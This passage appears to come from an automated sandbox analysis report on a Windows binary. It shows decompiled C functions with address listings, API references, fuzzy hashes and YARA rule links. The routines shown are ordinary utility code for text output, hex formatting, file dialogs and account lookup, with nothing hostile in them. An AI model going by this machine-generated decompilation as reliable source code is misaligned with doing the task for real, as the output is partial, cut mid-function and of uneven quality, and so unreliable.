                                                                                                                                                                    • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                                                                  • GetWindow.USER32 ref: 00402E16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Rect$ClientPoints
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4235085887-0
                                                                                                                                                                  • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                  • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                  • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                                                                  0x0040b6a6
                                                                                                                                                                  0x0040b6ad
                                                                                                                                                                  0x0040b6af
                                                                                                                                                                  0x0040b6b0
                                                                                                                                                                  0x0040b6b5
                                                                                                                                                                  0x0040b6b6
                                                                                                                                                                  0x0040b6bd
                                                                                                                                                                  0x0040b6bf
                                                                                                                                                                  0x0040b6c0
                                                                                                                                                                  0x0040b6c5
                                                                                                                                                                  0x0040b6c6
                                                                                                                                                                  0x0040b6cd
                                                                                                                                                                  0x0040b6cf
                                                                                                                                                                  0x0040b6d0
                                                                                                                                                                  0x0040b6d5
                                                                                                                                                                  0x0040b6d6
                                                                                                                                                                  0x0040b6dd
                                                                                                                                                                  0x0040b6df
                                                                                                                                                                  0x0040b6e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b6e5
                                                                                                                                                                  0x0040b6e6

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                  • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                                                                  • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                  • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                                                                  0x00407362
                                                                                                                                                                  0x00407369
                                                                                                                                                                  0x0040736e
                                                                                                                                                                  0x00407371
                                                                                                                                                                  0x00407378
                                                                                                                                                                  0x0040737e
                                                                                                                                                                  0x00407381
                                                                                                                                                                  0x00407386
                                                                                                                                                                  0x0040739f
                                                                                                                                                                  0x00407388
                                                                                                                                                                  0x00407391
                                                                                                                                                                  0x00407391
                                                                                                                                                                  0x004073a4
                                                                                                                                                                  0x004073ac
                                                                                                                                                                  0x004073ad
                                                                                                                                                                  0x004073cd
                                                                                                                                                                  0x004073d0
                                                                                                                                                                  0x004073d3
                                                                                                                                                                  0x004073d6
                                                                                                                                                                  0x004073e0
                                                                                                                                                                  0x004073e7
                                                                                                                                                                  0x004073ee
                                                                                                                                                                  0x004073f5
                                                                                                                                                                  0x0040741a
                                                                                                                                                                  0x0040741a
                                                                                                                                                                  0x0040741d
                                                                                                                                                                  0x00407420
                                                                                                                                                                  0x00407423
                                                                                                                                                                  0x00407426
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004073fc
                                                                                                                                                                  0x00407400
                                                                                                                                                                  0x0040740f
                                                                                                                                                                  0x00407412
                                                                                                                                                                  0x00407412
                                                                                                                                                                  0x00407402
                                                                                                                                                                  0x00407402
                                                                                                                                                                  0x00407407
                                                                                                                                                                  0x00407407
                                                                                                                                                                  0x00407413
                                                                                                                                                                  0x00407419
                                                                                                                                                                  0x00407419
                                                                                                                                                                  0x00407419
                                                                                                                                                                  0x0040742f
                                                                                                                                                                  0x00407434
                                                                                                                                                                  0x00407437
                                                                                                                                                                  0x00407439
                                                                                                                                                                  0x0040743b
                                                                                                                                                                  0x0040743b
                                                                                                                                                                  0x0040744e
                                                                                                                                                                  0x00407453
                                                                                                                                                                  0x00407453
                                                                                                                                                                  0x004073af
                                                                                                                                                                  0x004073b2
                                                                                                                                                                  0x004073ba
                                                                                                                                                                  0x004073bb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004073bd
                                                                                                                                                                  0x004073c3
                                                                                                                                                                  0x004073c3
                                                                                                                                                                  0x004073bb
                                                                                                                                                                  0x0040745c
                                                                                                                                                                  0x00407468
                                                                                                                                                                  0x00407468
                                                                                                                                                                  0x0040746d
                                                                                                                                                                  0x00407473
                                                                                                                                                                  0x0040747c
                                                                                                                                                                  0x0040748e

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcschr.MSVCRT ref: 004073A4
                                                                                                                                                                  • wcschr.MSVCRT ref: 004073B2
                                                                                                                                                                    • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                                                                    • Part of subcall function 0040565D: memcpy.MSVCRT(?,?,00000000,?,00000000,?,?,0040140B,00000000,0040C4E8,004101D8,0040C4E8,00401A21,?,EnvironmentVariables), ref: 0040569D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                                                                  • String ID: "
                                                                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                                                                  • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                  • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                                  			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                                                                  0x00401676
                                                                                                                                                                  0x0040167e
                                                                                                                                                                  0x0040168a
                                                                                                                                                                  0x0040168c
                                                                                                                                                                  0x00401690
                                                                                                                                                                  0x00401691
                                                                                                                                                                  0x00401696
                                                                                                                                                                  0x0040169d
                                                                                                                                                                  0x004016a2
                                                                                                                                                                  0x004016aa
                                                                                                                                                                  0x004016aa
                                                                                                                                                                  0x004016aa
                                                                                                                                                                  0x004016ad
                                                                                                                                                                  0x004016ae
                                                                                                                                                                  0x004016b3
                                                                                                                                                                  0x004016b9
                                                                                                                                                                  0x004016bb
                                                                                                                                                                  0x004016bc
                                                                                                                                                                  0x004016c1
                                                                                                                                                                  0x004016c8
                                                                                                                                                                  0x004016cd
                                                                                                                                                                  0x004016ce
                                                                                                                                                                  0x004016ea
                                                                                                                                                                  0x004016ff
                                                                                                                                                                  0x0040170c
                                                                                                                                                                  0x004016d0
                                                                                                                                                                  0x004016e3
                                                                                                                                                                  0x004016e3
                                                                                                                                                                  0x00401711
                                                                                                                                                                  0x00401714
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401719
                                                                                                                                                                  0x0040171c

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf
                                                                                                                                                                  • String ID: Line%d$Lines
                                                                                                                                                                  • API String ID: 3988819677-2790224864
                                                                                                                                                                  • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                                                                  • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                                                                  • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                                                                  0x00405132
                                                                                                                                                                  0x00405135
                                                                                                                                                                  0x00405139
                                                                                                                                                                  0x0040513e
                                                                                                                                                                  0x00405141
                                                                                                                                                                  0x004051b3
                                                                                                                                                                  0x00405143
                                                                                                                                                                  0x00405145
                                                                                                                                                                  0x00405147
                                                                                                                                                                  0x0040514c
                                                                                                                                                                  0x0040514e
                                                                                                                                                                  0x00405151
                                                                                                                                                                  0x00405151
                                                                                                                                                                  0x0040515b
                                                                                                                                                                  0x0040515c
                                                                                                                                                                  0x0040515d
                                                                                                                                                                  0x0040515e
                                                                                                                                                                  0x0040515f
                                                                                                                                                                  0x00405168
                                                                                                                                                                  0x00405169
                                                                                                                                                                  0x00405171
                                                                                                                                                                  0x00405173
                                                                                                                                                                  0x00405174
                                                                                                                                                                  0x00405182
                                                                                                                                                                  0x00405184
                                                                                                                                                                  0x00405189
                                                                                                                                                                  0x0040518c
                                                                                                                                                                  0x00405194
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405196
                                                                                                                                                                  0x0040519a
                                                                                                                                                                  0x0040519b
                                                                                                                                                                  0x004051a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004051a1
                                                                                                                                                                  0x004051a3
                                                                                                                                                                  0x004051a3
                                                                                                                                                                  0x004051a6
                                                                                                                                                                  0x004051af
                                                                                                                                                                  0x004051b0
                                                                                                                                                                  0x004051b7

                                                                                                                                                                  APIs
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00405174
                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00405184
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                                                                  • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                  • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                                                                  • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 43%
                                                                                                                                                                  			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                                                                  0x004075bb
                                                                                                                                                                  0x004075c2
                                                                                                                                                                  0x004075c7
                                                                                                                                                                  0x004075ca
                                                                                                                                                                  0x004075cd
                                                                                                                                                                  0x004075d8
                                                                                                                                                                  0x004075e9
                                                                                                                                                                  0x004075fc
                                                                                                                                                                  0x00407600
                                                                                                                                                                  0x00407601
                                                                                                                                                                  0x00407606
                                                                                                                                                                  0x00407609
                                                                                                                                                                  0x0040760e
                                                                                                                                                                  0x00407619
                                                                                                                                                                  0x0040761e
                                                                                                                                                                  0x0040761f
                                                                                                                                                                  0x00407624
                                                                                                                                                                  0x00407636

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf
                                                                                                                                                                  • String ID: %%-%d.%ds
                                                                                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                                                                                  • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                  • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                  • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                                                                  0x00405080
                                                                                                                                                                  0x00405086
                                                                                                                                                                  0x0040508b
                                                                                                                                                                  0x0040508e
                                                                                                                                                                  0x00405091
                                                                                                                                                                  0x00405097
                                                                                                                                                                  0x0040509d
                                                                                                                                                                  0x004050a4
                                                                                                                                                                  0x004050ab
                                                                                                                                                                  0x004050b2
                                                                                                                                                                  0x004050b5
                                                                                                                                                                  0x004050bc
                                                                                                                                                                  0x004050cb
                                                                                                                                                                  0x004050e0
                                                                                                                                                                  0x004050cd
                                                                                                                                                                  0x004050d1
                                                                                                                                                                  0x004050dc
                                                                                                                                                                  0x004050dc

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileNameOpenwcscpy
                                                                                                                                                                  • String ID: L
                                                                                                                                                                  • API String ID: 3246554996-2909332022
                                                                                                                                                                  • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                  • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                                                                  • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                                                                  0x00409072
                                                                                                                                                                  0x00409074
                                                                                                                                                                  0x0040907d
                                                                                                                                                                  0x00409086
                                                                                                                                                                  0x0040908e
                                                                                                                                                                  0x004090a5
                                                                                                                                                                  0x004090a5
                                                                                                                                                                  0x0040908e
                                                                                                                                                                  0x004090ac

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,LookupAccountSidW,000000FF,?,Y@,00409C23,?,?,?,?,?,?,?,?,?,?), ref: 00409086
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: LookupAccountSidW$Y@
                                                                                                                                                                  • API String ID: 190572456-2352570548
                                                                                                                                                                  • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                  • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                                                                  • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                  • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

